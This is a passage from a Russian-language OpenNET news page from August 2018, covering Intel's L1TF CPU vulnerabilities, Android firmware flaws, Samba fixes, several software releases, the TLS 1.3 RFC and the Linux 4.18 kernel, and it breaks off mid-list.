The OpenNET Project / Index page

[ новости/++ | форум | wiki | теги | ]

14.08.2018 L1TF - три новые уязвимости в механизме спекулятивного выполнения CPU Intel (146 +24)
  Компания Intel раскрыла сведения о группе уязвимостей в механизме спекулятивного выполнения CPU, представленных под кодовым именем Foreshadow или L1 Terminal Fault (L1TF).

Уязвимости манипулируют тем, что при доступе к памяти по виртуальному адресу, приводящему к исключению (terminal page fault) из-за отсутствия флага Present в таблице страниц памяти, процессоры Intel спекулятивно рассчитывают физический адрес и загружают данные, если они имеются в L1-кэше. Спекулятивное обращение выполняется до завершения перебора таблицы страниц памяти и независимо от состояния записи в таблице страниц памяти (PTE), т.е. до проверки наличия данных в физической памяти и их доступности для чтения. После завершения проверки доступности памяти, в случае отсутствия флага Present в PTE операция отбрасывается, но данные оседают в кэше и их можно извлечь при помощи методов определения содержимого кэша по сторонним каналам (через анализ изменения времени доступа к прокэшированным и не прокэшированным данным).

L1TF присвоен высокий уровень опасности, так как уязвимость позволяет определить данные по любому физическому адресу в системе, независимо от применяемых механизмов изоляции и виртуализации (например, можно атаковать систему из гостевой системы). Ограничением атаки является то, что для восстановления содержимого L1-кэша код для эксплуатации уязвимости должен выполняться на том же физическом ядре CPU, что и код, вызывающий page fault.

Всего предложено три варианта уязвимости:

  • CVE-2018-3615 - извлечение данных из памяти анклавов Intel Software Guard Extensions (Intel SGX);
  • CVE-2018-3620 - извлечение данных из SMM (System Management Mode) и областей памяти ядра ОС;
  • CVE-2018-3646 - утечка данных из виртуальных машин в системах виртуализации.

Проблемам подвержены только процессоры Intel. Отмечается, что уязвимости уже устранены в прошлом обновлении микрокода. Для исправления первой проблемы достаточно обновления микрокода. Исправление второй и третьей проблемы выпущено в виде патча для ядра Linux и исправления для гипервизора Xen. Обновления уже формируются для дистрибутивов Ubuntu, Oracle, RHEL, SUSE, Debian и FreeBSD. Суть добавленной в ядро защиты сводится к использованию в записи PTE с пустым флагом Present ссылки на некэшируемую память (инверсия PTE). Для защиты систем виртуализации задействован сброс L1-кэша при переключении контекста виртуальных машин.

По данным Intel негативное влияние исправления на производительность составляет от 0% (клиентские применения) до 7% (при симуляции нагрузки на web-сервер в виртуальной машине). По тестам Red Hat инверсия PTE не создаёт негативного влияния на производительность, а сброс L1-кэша в большинстве применений замедляет работу не более чем на 2-5%, но в отдельных нагрузках замедление достигает 14% (без обновления микрокода - 27%). Как вариант блокирования уязвимости отмечается и отключение Hyper-Threading, но в этом случае падение производительности может достигать 30-50%.

  1. Главная ссылка к новости
  2. OpenNews: Атака NetSpectre, приводящая к утечке содержимого памяти по сети
  3. OpenNews: Представлена SpectreRSB, новая уязвимость в механизме спекулятивного выполнения CPU
  4. OpenNews: Два новых варианта уязвимости Spectre. Усиление защиты Chrome
  5. OpenNews: LazyFP - новая уязвимость в процессорах Intel
  6. OpenNews: Представлена Spectre-NG, группа из 8 новых уязвимостей в процессорах
Обсуждение (146 +24) | Тип: Проблемы безопасности |
14.08.2018 47 уязвимостей в Android-прошивках и новый вид атак Man-in-the-Disk (113 +28)
  Компания Kryptowire представила на конференции DEF CON результаты своего исследования прошивок различных Android-смартфонов, в результате которого было выявлено 47 уязвимостей, затрагивающих 27 различных моделей смартфонов от Alcatel, ASUS, LG, ZTE, Sony, Nokia, Orbic, Oppo, MXQ и ряда других производителей.

Уязвимости достаточно разноплановые, от инициирования краха прошивки, очистки всех данных пользователя и скрытого создания скриншотов или записи видео содержимого экрана, до получения root-привилегий, установки приложений без ведома пользователя, неавторизированной отправки SMS и доступа к адресной книге.

Все выявленные уязвимости выходят за пределы штатной модели управления доступом Android и, как правило, затрагивают дополнительные надстройки и драйверы, добавленные производителями. Уязвимости выявлены в рамках программы по анализу дополняющих базовую платформу драйверов и установленных по умолчанию программ. Исследование профинансировано Министерством внутренней безопасности США.

Дополнительно можно отметить публикацию компанией Check Point описания нового вектора атак на приложения для платформы Android - "Man-in-the-Disk". В настоящее время большое число приложений при установке запрашивают полномочия на доступ к внешнему хранилищу, которое используется для хранения временных и рабочих файлов на SD-карте или дополнительном Flash с целью экономии внутренней памяти смартфона.

Суть атаки в том, что на внешних накопителях отсутствует должное разделение привилегий и любое приложение имеет доступ ко всем данным на накопителе. Например, вредоносное приложение может подменить или изменить данные любых других установленных приложений и инициировать в лучшем случае их крах или некорректное выполнение, а в худшем подменить исполняемые компоненты приложений на вредоносный код.

Отмечается, что данной проблеме подвержены многие популярные программы. Например, продемонстрирована возможность инициирования отказа в обслуживании для Google Translate, Yandex Translate, Google Voice Typing и Google Text-to-Speech, а также организация обновления Xiaomi Browser до модифицированного вредоносного варианта. Атака по подмене приложения сводится к тому, что если программа сохраняет загруженное обновление во временный файл во внешнем хранилище, атакующий может отследить момент загрузки обновления и подменить его перед началом установки. Отказы в обслуживании инициируются через модификацию данных приложения на внешнем хранилище.

Для блокирования нового класса атак рекомендуется рассматривать все данные с внешних хранилищ как не заслуживающие доверия, обеспечивая полную проверку их корректности и не перенося на внешние хранилища исполняемые файлы или Java-классы. Для всех важных и исполняемых данных, сохраняемых во внешних хранилищах, обязательно должна обеспечиваться проверка целостности по цифровой подписи.

  1. Главная ссылка к новости
Обсуждение (113 +28) | Тип: Проблемы безопасности |
14.08.2018 Обновление Samba 4.8.4, 4.7.9 и 4.6.16 с устранением уязвимостей (21 +4)
  Подготовлены корректирующие выпуски пакета Samba 4.8.4, 4.7.9 и 4.6.16, в которых устранено несколько уязвимостей:
  • CVE-2018-1139 - позволяет применить для аутентификации устаревший алгоритм NTLMv1, даже если он отключен в настройках;
  • CVE-2018-1140 - отсутствие проверки на нулевой указатель может привести к краху Samba AD DC при отправке определённым образом оформленных запросов через DNS или LDAP;
  • CVE-2018-10858 - при обращении клиента к серверу, подконтрольному злоумышленнику, возможно повреждение областей памяти libsmbclient;
  • CVE-2018-10918 - отсутствие проверки на нулевой указатель может привести к краху Samba AD DC через отправку аутентифицированного запроса через DRSUAPI RPC;
  • CVE-2018-10919 - отсутствие проверки прав доступа позволяет выяснить значения конфиденциальных атрибутов через формирование поискового запроса в LDAP.

  1. Главная ссылка к новости
  2. OpenNews: Выпуск Samba 4.8.0
  3. OpenNews: Критическая уязвимость в Samba, позволяющая поменять пароль любого пользователя
  4. OpenNews: Обновление Samba 4.7.3, 4.6.11 и 4.5.15 с устранением уязвимостей
  5. OpenNews: Обновление Samba 4.6.8, 4.5.14 и 4.4.16 с устранением уязвимостей
  6. OpenNews: Критическая уязвимость в Heimdal Kerberos, затрагивающая Samba 4
Обсуждение (21 +4) | Тип: Проблемы безопасности |
14.08.2018 Новый стабильный релиз открытой биллинговой системы Ubilling 0.9.1 (38 +4)
  После нескольких месяцев затишья произошел релиз открытой биллинговой системы Ubilling, выступающий надстройкой над ядром Stargazer, свободной системы учёта и авторизации в локальных, домашних и офисных сетях, написанной на C. Код веб-интерфейса Ubilling написан на PHP и распространяется под лицензией GPLv2. Для предварительного ознакомления с системой запущен демонстрационный web-интерфейс.

Среди основных изменений:

  • Модуль «Печать документов»: при создании документов на основе публичных шаблонов, чекбокс публичности теперь по умолчанию установлен.
  • Модуль «Печать документов»: добавлена возможность редактировать имя и публичность существующих шаблонов docx.
  • Модуль «Помощник прокрастинации»: сильно переработан, теперь прокрастинировать можно намного эффективнее.
  • Модуль «Живи с этим»: изменен процесс логирования выполненных задач. Теперь в логе запись не дублируется, а обновляется оригинальная.
  • Модуль «Живи с этим»: для операции «добавить денег» добавлена возможность выбора типа оплат для внесения денег на счет.
  • Модуль «Живи с этим»: для операции «добавить денег» исправлена функция установки типа оплат при массовом создании задач.
  • Модуль «Понизатор»: добавлена опциональная статистика по заполнению OLT зарегистрированными на портах ONUшками.
  • Модуль «SMSZilla»: добавлена возможность фоновой рассылки при помощи RemoteAPI.
  • Модуль «Учет зарплат»: все отчеты вынесены в отдельный раздел «Отчеты».
  • Модуль «Учет зарплат»: добавлен годичный отчет по зарплатам всех сотрудников.
  • Модуль «Настройки системы»: добавлена возможность редактировать случайные файлы конфигурации.
  • Модуль «Планирование работ»: все редко используемые элементы, унесены в отдельный раздел «Инструменты».
  • Новый модуль «Сроки выполнения задач»: работает отчетом, при помощи которого можно оценить время реакции и выполнения запланированных задач.
  • Модуль «КучаГен»: добавлено нормальное определение изменения состояния пользователей, CoA теперь работает.
  • Модуль «КучаГен»: добавлен тип сервисов «CoA + POD».
  • Модуль «КучаГен»: полностью переработана работа с атрибутами
  • Модуль «КучаГен»: для шаблонов атрибутов, добавлены модификаторы «Пользователь» для NAS с не только активными пользователями.
  • Модуль «КучаГен»: добавлена пачка новых макросов, предназначенных для использования в сервисах PoD и CoA.
  • Модуль «КучаГен»: добавлены новые уровни логирования для отладки сервисов.
  • Модуль «КучаГен»: в настройки NAS добавлен порт который можно получить из макроса {NASPORT}
  • Модуль «КучаГен»: исправлено редактирование значения шаблонов атрибутов содержащих двойные кавычки
  • Модуль «КучаГен»: для шаблонов атрибутов теперь доступен сценарий groupreply.
  • Модуль «КучаГен»: решены проблемы кластеризации и производительности, при использовании табличек сценариев в innodb.
  • Модуль «КучаГен»: добавлены преднастройки для работы с FreeRadius3.
  • Модуль «КучаГен»: добавлена возможность полного клонирования конфигурации ранее настроенного NAS.
  • Модуль «Удаление пользователя»: теперь запускает быструю регенерацию атрибутов после деактивации пользователя, перед его удалением.
  • Модуль «Склад»: в список приходных операций добавлен показ примечаний.
  • Модуль «Планирование работ»: добавлен режим печати не разрезными табличками с группировкой по сотрудникам.
  • Модуль «Консоль разработчика»: теперь чуть менее страшная.
  • Модуль «Редактирование мобильного»: теперь умеет отключать фильтры номеров для основной и дополнительных мобильных систем.
  • Модуль «Записи разговоров Askozia»: теперь также показывает навешенные на пользователя теги.
  • Модуль «Планирование работ»: в отсылаемых сотрудникам SMS теперь фигурирует тип задачи. Они должны знать, что они будут делать по адресу.
  • Модуль «Экзистенциальный конь»: добавлена отдельная колонка с динамикой изменения пользовательской базы.
  • Модуль «Свитчи»: топ упокоившихся свитчей вынесен в отдельный раздел, теперь он показывает топ только за текущий месяц.
  • Модуль «Свитчи»: в топе упокоившихся свитчей налажена сортировка.
  • Модуль «Сервера доступа (NAS)»: теперь при удалении NAS также удаляется и вся его конфигурация относящаяся к КучаГен-у.
  • Модуль «Редактирование электропочты»: добавлена принудительная проверка шаблона.
  • Модуль «Движение средств»: добавлена подсветка виртуальных сервисов и бонусов а также других типов дополнительных платежей.
  • Модуль «Поиск оплат»: добавлен дополнительный фильтр по содержимому примечаний платежей.
  • Модуль «Персональные заметки и напоминания»: косметика, улучшено юзабилити.
  • Модуль «Отчет по пунктам продаж»: исправлено несоответствие колонок с количеством активированных карточек и суммой.
  • Модуль «Динамический шейпер»: dnswitch теперь должен нормально работать с PHP7.
  • Кабинет пользователя: исправлена проблема, при которой пользователи ранее не могли скачать документы, сгенерированные по не публичным шаблонам.
  • OpenPayz: в бекенд liqpay добавлена возможность оплачивать на разные магазины по установленному тегу в профиле пользователя (как работает читаем комментарии в конфигурационном файле бекенда).
  • OpenPayz: в бекенд liqpay добавлена возможность вручную вводить сумму платежа, регулируется параметром CUSTOM_PRICE. Значение CUSTOM_PRICE так-же указывает на минимально допустимое значение ввода суммы. Также произведена небольшая косметика кода.
  • OpenPayz: добавлена возможность указывать для каждой платежной системы свой тип платежей посредством опций CASHTYPEID_СИСТЕМА.
  • RemoteAPI: добавлен вызов smszilla производящий рассылку в фоновом режиме.
  • RemoteAPI: добавлен вызов multigentotal для сброса всех сценариев с последующей регенерацией атрибутов и отработкой сервисов.
  • RemoteAPI: добавлен вызов onepunch предназначенный для вызова One-Punch скриптов.
  • Собака-посылака: добавлен новый СМС-сервис SkyRiver (SkySms)
  • Новый модуль «История СМС сообщений». Позволяет собирать и хранить статусы отправленных СМС.
  • Модуль «Профиль пользователя»: отныне данные о БС не загружаются автоматически при открытии профиля пользователя и для их получения нужно нажать соответствующую кнопку.
  • Модуль «Планирование работ»: добавлена возможность включить дополнительные поля фильтрации задач. Регулируется опцией TASKMAN_ADV_FILTERS в alter.ini.
  • UBinstaller: собраны бинарные пакеты для FreeBSD 11.2 amd64.
  • UBinstaller: добавлена возможность выбора экспериментального Stargazer 2.409-rc5 при установке.

  1. Главная ссылка к новости
  2. OpenNews: Выпуск открытой биллинговой системы ABillS Base 0.78.30
  3. OpenNews: Релиз открытой биллинговой системы Ubilling 0.8.5
Обсуждение (38 +4) | Автор: ivan34 | Тип: Программы |
13.08.2018 Релиз профессионального видеоредактора DaVinci Resolve 15 (79 +13)
  Компания Blackmagic Design, специализирующаяся на производстве профессиональных видеокамер и систем обработки видео, опубликовала выпуск проприетарной системы цветокоррекции и нелинейного монтажа DaVinci Resolve 15, используемой многими известными голливудскими киностудиями в процессе производства фильмов, сериалов, рекламных роликов, телепрограмм и видеоклипов. DaVinci Resolve объединяет в одном приложении средства для монтажа, цветоустановки, наложения звука, финальной обработки и создания конечного продукта.

Сборки DaVinci Resolve подготовлены для Linux, Windows и macOS. Для загрузки требуется регистрация. Бесплатная версия имеет ограничения, связанные с выпуском продукции для коммерческого кинопоказа в кинотеатрах (монтаж и цветокоррекция 3D-кино, сверхвысокие разрешения и т.п.), но не ограничивает базовые возможности пакета, поддержку профессиональных форматов для импорта и экспорта, сторонних плагинов.

Новые возможности:

  • Интегрированные средства для наложение визуальных эффектов;
  • Страница Fusion, содержащая более 250 инструментов для композитинга;
  • Значительно расширены возможности редактора и колориста, а также функциональность Fairlight;
  • Оптимизация производительности при рендеринге клипов в H.264.
  • Сохранение имен клипов и дополнительной информации при работе с окном просмотра.
  • Форматирование текста субтитров в HTML.
  • Поддержка шаблонов для 2D- и 3D-титров.
  • Изменение длительности фрагмента на монтажной линейке страницы Edit.
  • Добавление значка Dynamic Trim на панель инструментов, содержащую индикацию режима Slip или Slide.
  • Редактирование параметров автоматизации звука на странице Fairlight.
  • Наличие заданных конфигураций параметров для плагина FairlightFX и возможность создания пользовательских.
  • Создание звуковых библиотек с помощью базы данных DaVinci Resolve.
  • Поддержка плагинов ResolveFX и OpenFX на странице Fusion.
  • На все страницы добавлена кнопка для пропуска настройки цветов и эффектов Fusion.
  • Возможность копировать композиции, созданные во Fusion, и их добавление к другим клипам.
  • Изменение свойств видео и подгонки в узлах MediaIn.
  • На страницу Fusion добавлены узлы Saver.
  • Регулировка области черного при выводе клипа на странице Color.
  • Назначение пользовательских цветов для узлов на странице Color.
  • Улучшено создание изображений с прозрачностью.
  • Значительно улучшен анализ оптического потока.
  • Расширена поддержка скриптов DCTL и их совместимость с ResolveFX.
  • Сокращено время отклика при работе с плагинами OpenFX и ResolveFX.
  • Поддержка кодирования скрытых субтитров CEA-708 в клипах MXF OP1a.
  • Поддержка кодирования клипов EXR с альфа-каналами.
  • Сохранение уровня звука при импорте AAF-клипов.
  • Расширен список кодеков и форматов на странице Deliver.
  • Одновременный мониторинг SDR- и HDR-видео в форматах Dolby Vision™ и HDR10+.
  • Импорт AAF-клипов только со звуком.
  • Поддержка XML 1.8 с Final Cut Pro X.



Основные особенности DaVinci Resolve:

  • Широкие возможности для цветоустановки;
  • Высокая производительность с возможностью использования до восьми графических процессоров, что позволяет получать результат в реальном времени. Для быстрого рендеринга и формирования конечного продукта можно использовать кластерные конфигурации;
  • Профессиональные средства монтажа разных типов материала - от телесериалов и рекламных роликов до контента, снятого с помощью нескольких камер;
  • Инструменты редактирования учитывают контекст выполняемой операции и автоматически определяют параметры обрезки по местоположению курсора мыши;
  • Средства синхронизации и микширования звука;
  • Гибкие возможности по управлению медиаматериалами - файлы, временные шкалы и целые проекты легко перемещать, объединять и архивировать;
  • Функция Clone, позволяющая копировать полученное с камер видео одновременно в несколько каталогов с проверкой по контрольной сумме;
  • Возможность импортировать и экспортировать метаданные с помощью CSV-файлов, создавать на их основе пользовательские окна, автоматические каталоги и списки;
  • Мощная функциональность для обработки и создания конечного продукта в любом разрешении, будь то мастер-копия для телевидения, цифровой пакет для кинотеатров или для распространения в интернете;
  • Поддержка экспорта в разных форматах, в том числе с дополнительной информацией, формирование файлов EXR и DPX для наложения визуальных эффектов, а также вывод несжатого 10-битного видео и в ProRes для редактирования в таких приложениях, как Final Cut Pro X;
  • Поддержка плагинов ResolveFX и OpenFX;
  • Средства для стабилизации и трекинга изображений на экране, не требующие создания опорных кадров;
  • Вся обработка изображений осуществляется в цветовом пространстве YRGB с точностью 32-разрядных чисел с плавающей запятой, что позволяет корректировать параметры яркости без повторной цветобалансировки в областях тени, полутона и света;
  • Шумоподавление в реальном времени;
  • Полное управление цветом на всех этапах процесса с поддержкой стандарта ACES 1.0 (Academy Color Encoding Specification). Возможность использования различных цветовых пространств для исходного и конечного материала, а также для временной шкалы;
  • Возможность обработки видео с широким динамическим диапазоном (HDR);
  • Цветоустановка на основе файлов RAW;
  • Автоматическая первичная цветокоррекция и автоматическое согласование кадров.

  1. Главная ссылка к новости
  2. OpenNews: Релиз видеоредактора Shotcut 18.08
  3. OpenNews: Выпуск свободного видеоредактора OpenShot 2.4.2
  4. OpenNews: Релиз профессионального видеоредактора DaVinci Resolve 14
  5. OpenNews: Релиз видеоредактора Lightworks 14 для Linux
Обсуждение (79 +13) | Тип: Программы |
13.08.2018 Выпуск Launchpad Daemon 1.5, программного аналога MIDI-контроллера (32 +4)
  Доступен новый выпуск Launchpadd, программного аналога MIDI-контроллера для создания музыки с помощью кнопок (Pads) для смартфонов и планшетов на платформе Android. Программа поддерживает клиент-серверный режим, в котором ноты отправляются на компьютер, а далее в любую программу, которая поддерживает миди сокеты.

Изменения:

  • Добавлена функция загрузки пресетов по умолчанию из репозитория при первой установке приложения.
  • Добавлено простейшее меню с возможностью менять преднастройки.
  • Добавлена возможность менять преднастройки одновременно на клиенте и на сервере. (активировано по умолчанию)
  • Удалены ненужные функции. (такие как вывод /proc/cpuinfo в консоль и прочее...)
  • Добавлена поддержка альбомной ориентации.
  • Значение «usemidi» было перемещено из основного файла настройки в файл настроек пресетов.
  • Исправлены ошибки: исключения связанные с работой MIDI API теперь обрабатываются правильно.
  • Исправлена поддержка на более новых версиях android. (7+)


  1. Главная ссылка к новости
Обсуждение (32 +4) | Автор: Skullnet | Тип: Программы |
13.08.2018 Опубликован RFC для TLS 1.3 (23 +18)
  Комитет IETF (Internet Engineering Task Force), занимающийся развитием протоколов и архитектуры интернета, завершил формирование RFC для протокола TLS 1.3 и опубликовал связанную с ним спецификацию под идентификатором RFC 8446. RFC получил статус "Предложенного стандарта", после чего начнётся работа по приданию RFC статуса чернового стандарта (Draft Standard), фактически означающего полную стабилизацию протокола и учёт всех высказанных замечаний.

Установка защищённых соединений с использованием TLS 1.3 уже поддерживается в Firefox и Chrome, и реализована в ветке OpenSSL 1.1.1, которая пока находится на стадии тестирования. О включении поддержки TLS 1.3 на своих серверах заявили компании Cloudflare, Google и Facebook. Facebook отмечает, что уже около 50% всего трафика к социальной сети обрабатывается с использованием TLS 1.3.

Особенности TLS 1.3:

  • Работа только в режиме совершенной прямой секретности (PFS, Perfect Forward Secrecy), при котором компрометация одного из долговременных ключей не позволяет расшифровать ранее перехваченный сеанс. Оставление поддержки только PFS вызвало много споров и стало камнем преткновения в достижении консенсуса, так как ряд производителей указывали на возможное негативное влияние PFS на корпоративные системы, в локальных сетях которых применяется инспектирование проходящего трафика, например, для обеспечения отказоустойчивости, мониторинга, диагностики проблем, фильтрации вредоносного ПО и выявления атак;
  • Сокращение числа шагов при согласованиии соединения и поддержка режима 0-RTT для устранения задержек при возобновлении ранее установленных HTTPS-соединений. При установке HTTPS-соединения выполняются 4 фазы: запрос DNS, TCP Handshake (1 RTT), TLS Handshake (2 RTT на согласование ключей и параметров шифрованного канала) и отправка запроса HTTP (1 RTT). По сравнению с TLS 1.2 в новом стандарте число RTT для TLS Handshake сокращено с 2 до 1, т.е. для установки и возобновления соединения требуется запрос DNS и 3 цикла обмена данными (RTT) вместо 4. 0-RTT позволяет сохранить ранее согласованные параметры TLS и снизить до 2 число RTT при возобновлении ранее установленного соединения. По данным Facebook, по сравнению с TLS 1.2 использование TLS 1.3 приводит к сокращению задержек на 46% при установке соединений и на 10% при отправке первого запроса;
  • Поддержка потокового шифра ChaCha20 и алгоритма аутентификации сообщений (MAC) Poly1305, разработанных Дэниелом Бернштейном (Daniel J. Bernstein), Таней Ланге (Tanja Lange) и Питером Швабе (Peter Schwabe). ChaCha20 и Poly1305 можно рассматривать, как более быстрые и безопасные аналоги AES-256-CTR и HMAC, программная реализация которых позволяет добиться фиксированного времени выполнения без задействования специальных аппаратных ускорителей;
  • Поддержка защищённых ключей аутентификации на основе цифровых подписей Ed25519, которые обладают более высоким уровнем безопасности, чем ECDSA и DSA, и при этом отличаются очень высокой скоростью верификации и создания подписей. Стойкость к взлому для Ed25519 составляет порядка 2^128 (в среднем для атаки на Ed25519 потребуется совершить 2^140 битовых операций), что соответствует стойкости таких алгоритмов, как NIST P-256 и RSA с размером ключа в 3000 бит или 128-битному блочному шифру. Ed25519 также не подвержен проблемам с коллизиями в хэшах, не чувствителен к атакам через определение скорости работы кэша (cache-timing attacks) и атакам по сторонним каналам (side-channel attacks);
  • Поддержка обмена ключами на основе алгоритмов x25519 (RFC 7748) и x448 (RFC 8031);
  • Поддержка HKDF (HMAC-based Extract-and-Expand Key Derivation Function);
  • Удаление устаревших и ненадёжных криптографических примитивов (MD5, SHA-224) и возможностей (сжатие, повторное согласование, не-AEAD шифры, статический обмен ключами RSA и DH, указание unix-времени в Hello-сообщениях и т.п.).

  1. Главная ссылка к новости
  2. OpenNews: Организация EFF представила инициативу STARTTLS Everywhere
  3. OpenNews: В следующем выпуске Android появится поддержка "DNS over TLS"
  4. OpenNews: Дебаты вокруг TLS 1.3 и совершенной прямой секретности
  5. OpenNews: Новый метод атаки на TLS, затрагивающий 27 из 100 крупнейших сайтов
  6. OpenNews: Mozilla, Cloudflare, Fastly и Apple работают над применением шифрования для SNI
Обсуждение (23 +18) | Тип: К сведению |
13.08.2018 Релиз ядра Linux 4.18 (149 +41)
  После двух месяцев разработки Линус Торвальдс представил релиз ядра Linux 4.18. Среди наиболее заметных изменений в ядре 4.18: возможность монтирования ФС на базе FUSE непривилегированным пользователем, пакетный фильтр bpfilter, подсистема AF_XDP (eXpress Data Path), новый тип модулей ядра umh (usermode helper), device-mapper модуль writecache, поддержка SoC Qualcomm Snapdragon 845 и GPU AMD Vega 20, новый API поллинга для асинхронного ввода/вывода.

В новую версию принято 13 тысяч исправлений от 1668 разработчиков, размер патча - 50 Мб (изменения затронули 12866 файлов, добавлено 521039 строк кода, удалено - 619603 строк). Около 49% всех представленных в 4.18 изменений связаны с драйверами устройств, примерно 14% изменений имеют отношение к обновлению кода специфичного для аппаратных архитектур, 13% связано с сетевым стеком, 5% - файловыми системами и 3% c внутренними подсистемами ядра. 9.5% всех исправлений подготовлено разработчиками компании Intel, 7.5% - Red Hat, 4.6% - AMD, 4.3% - IBM, 3.8% - Linaro, 3.4% - Renesas Electronics, 3.0% - Google, 2.9% - SUSE, 2.8% - Samsung, 2.2% - Mellanox, 2.1% - Huawei, 2.0% - Oracle.

Основные новшества:

  • Сетевая подсистема
    • В состав ядра включен новый механизм фильтрации пакетов bpfilter, использующего предоставляемую ядром подсистему eBPF, но предлагая привычный синтаксис iptables. Bpfilter обрабатывает запросы API iptables и транслирует их в программы BPF, привязываемые к различным подсистемам. В настоящий момент в ядро добавлена только базовая инфраструктура для bpfilter, но ещё не хватает некоторых компонентов, необходимых для полноценного применения bpfilter для фильтрации пакетов;
    • В качестве сопутствующей bpfilter разработки в ядро добавлен новый тип модулей ядра umh (usermode helper), которые выполняются в пространстве пользователя и привязываются в базовым модулям, предоставляя для них вспомогательную функциональность, которую нецелесообразно или опасно выполнять c привилегиями ядра (например в модуле bpfilter.ko через них выполняется разбор и трансляция в BPF правил фильтрации). Модули umh функционируют под управлением ядра, оформляются в виде модулей ядра и загружаются через modprobe, но выполняются в пространстве пользователя с привилегиями пользовательских приложений. Взаимодействие umh-модулей с обычными модулями ядра производится с использованием неименованных каналов (unix pipe);
    • В состав ядра включена подсистема AF_XDP (eXpress Data Path), которая предоставляет средства для запуска BPF-программ на уровне сетевого драйвера, с возможностью прямого доступа к DMA-буферу пакетов, что позволяет создавать высокопроизводительные обработчики для работы в условиях большой сетевой нагрузки. В качестве примера реализованы обработчики для быстрой блокировки и перенаправления пакетов.
    • Реализована возможность чтения данных из сетевого сокета в режиме zero-copy (флаг TCP_ZEROCOPY_RECEIVEY), позволяющем организовать передачу данных по сети без промежуточного копирования данных между ядром и пространством пользователя (поддержка записи в режиме zero-copy была представлена в ядре 4.14);
    • В реализации протокола TLS на уровне ядра (KTLS) добавлена возможность задействования аппаратного ускорения операций с использовнием специализированных чипов. В настоящее время вынос связанных с работой TLS вычислений на плечи оборудования доступен только при использовании драйвера Mellanox mlx5;
    • В TCP-стек добавлена поддержка режима сжатия для выборочного подтверждения соединений (SACK), что позволяет сократить число отправляемых SACK-пакетов при перегрузке сети;
    • Добавлена возможность прикрепления BPF-программ к сокету и запуска обработчиков при вызове sendmsg(). Подобные обработчики могут применяться для выполнения таких задач, как перезапись IP-адресов в исходящих пакетах;
  • Виртуализация и безопасность
    • В подсистему шифрования (crypto) добавлена поддержка шифров AEGIS и MORUS, а также алгоритма сжатия Zstandard;
    • Пользователь с правами root в пространстве имён идентификаторов пользователя (user namespaces) теперь может монтировать файловые системы, даже если у него нет на это прав вне пространства имён. При этом файловая система должна быть специально помечена для разрешения подобных операций (в настоящий момент операции разрешены только для ФС, реализуемых в пространстве пользователя при помощи модулей FUSE);
    • В модуль fscrypt, применяемый для шифрования ФС F2FS и ext4, добавлена поддержка шифров Speck128 и Speck256, разработанных Агентством национальной безопасности США. Шифры обеспечивают очень высокую производительность программной реализации, которая обгоняет AES на системах без наличия средств аппаратного ускорения AES. Использование Speck позволяет применять шифрование на маломощных устройствах, на которых применение AES не оправдано из-за больших накладных расходов;
    • Для 32-разрядной архитектуры ARM обеспечена защита от уязвимостей Spectre 1 и Spectre 2 (ранее защита от Spectre была обеспечена для архитектур x86, ARM64 и S390). Для ARM64 добавлена защита от Spectre v4.
    • Проведена работа по переводу ядра на более защищёные от переполнения буфера варианты функций распределения памяти. Например, вызовы "kmalloc(count*size, gfp_flags)" заменены на "kmalloc_array(count, size, gfp_flags)";
    • Изменены настройки для включения защиты от переполнения стека - теперь автоматически включается наиболее действенный механизм защиты, доступный для текущей конфигурации;
  • Дисковая подсистема, ввод/вывод и файловые системы
    • Для Device Mapper реализован новый модуль "writecache", который может применяться для кэширования операций записи блоков на SSD-накопителях или в постоянной памяти (кэширование операций чтения не реализовано, так как такие операции и так кэшируются кэше страниц памяти в ОЗУ);
    • Обеспечена возможность применения флага IOCB_FLAG_IOPRIO для операций асинхронного ввода/вывода, позволяющего установить приоритет выполнения отдельных операций;
    • Добавлен новый API поллинга (определение готовности файлового дескриптора к вводу/выводу без блокировки), основанный на использовании системы асинхронного ввода/вывода (AIO);
    • В файловой системе Btrfs обеспечена возможность удаления пустого подраздела при помощи вызова rmdir() без специальных дополнительных привилегий. Добавлены новые ioctl-команды FS_IOC_FSGETXATTR и FS_IOC_FSSETXATTR для манипуляции с различными атрибутами файла (append, immutable, noatime, nodump и sync), которые в отличие от команд GET/SETFLAGS могут выставить атрибуты на уровне отдельных inode. Также реализован набор ioctl-команд для получения непривилегированным пользователем информации о подразделах;
    • В файловой системе XFS появилась возможность смены метки для уже примонтированной ФС, добавлена поддержка резервирования пустых областей через вызов fallocate() для файлов подкачки, задействован FUA для обеспечения прямой записи данных в режиме O_DSYNC. Кроме того, началась интеграция нового инструментария для восстановления целостности ФС на лету и выполнена переработка кода growfs с целью подготовки интеграции поддержки подразделов (subvolume);
    • В файловой системе ext4 продолжена работа по чистке кода и повышению надёжности работы в условиях обработки некорректных образов ФС, специально модифицированных для вредоносных целей;
    • Из раздела "staging" удалён код кластерной файловой системы Lustre. В качестве причин упоминается отсутствие должной активности по приведению имеющегося кода к соответствию с остальным ядром, плохая адаптация кода к изменениям в VFS, а также игнорирование проблем и периодическая публикация патчей, ломающих имеющуюся функциональность;
    • В файловой системе F2FS улучшена поддержка режима "discard";
  • Память и системные сервисы
    • В систему доменов управления питанием (genpd, generic power domain) добавлена поддержка уровней производительности, при помощи которых можно настраивать работу всей системы, включая периферийные устройства, для достижения требуемого баланса между потреблением энергии и производительностью;
    • В контроллер ресурсов памяти group, позволяющий управлять расходованием памяти группой задач, добавлен параметр memory.min, который в отличие от ранее доступного параметра memory.low предоставляет более надёжную гарантию предоставления минимального размера доступной для группы оперативной памяти (не отключается при срабатывании OOM killer в условиях нехватки памяти);
    • Добавлен системный вызов с реализацией перезапускаемых последовательностей (restartable sequences), позволяющих приложениям организовать неразрывное выполнение группы инструкций, не прерываемой и подтверждающей результат последней инструкцией в группе. По сути предоставляется средство для очень быстрого атомарного выполнения операций, которые в случае прерывания другим потоком очищаются и предпринимается повторная попытка выполнения. Возможность реализована для архитектур x86, ARM и PowerPC;
    • Реализован новый параметр запуска ядра no5lvl, предназначенный для отключения пятиуровневых таблиц страниц памяти, даже если оборудование обеспечивает их поддержку;
    • Из интерфейса /proc удалена статистика IPMI (по-прежнему оставлена в sysfs);
    • Добавлена новая система определения макросов для конфигурации ядра, которую можно использовать для выноса различных тестов, выполняемых на этапе сборки, из makefile в файлы Kconfig;
    • В JIT-компиляторе подсистемы eBPF реализована поддержка 32-разрядных систем x86;
  • Оборудование
    • В драйвер Nouveau добавлена поддержка GPU NVIDIA Volta;
    • В DRM-драйвер AMDGPU добавлена поддержка GPU AMD Vega 20, а также GPU Kabylake-G (VEGAM - intel и radeon на одном чипе). Добавлены профили управления питанием, напряжением и частотой для GPU Vega10. Реализован режим энергосбережения gfxoff для GPU Raven;
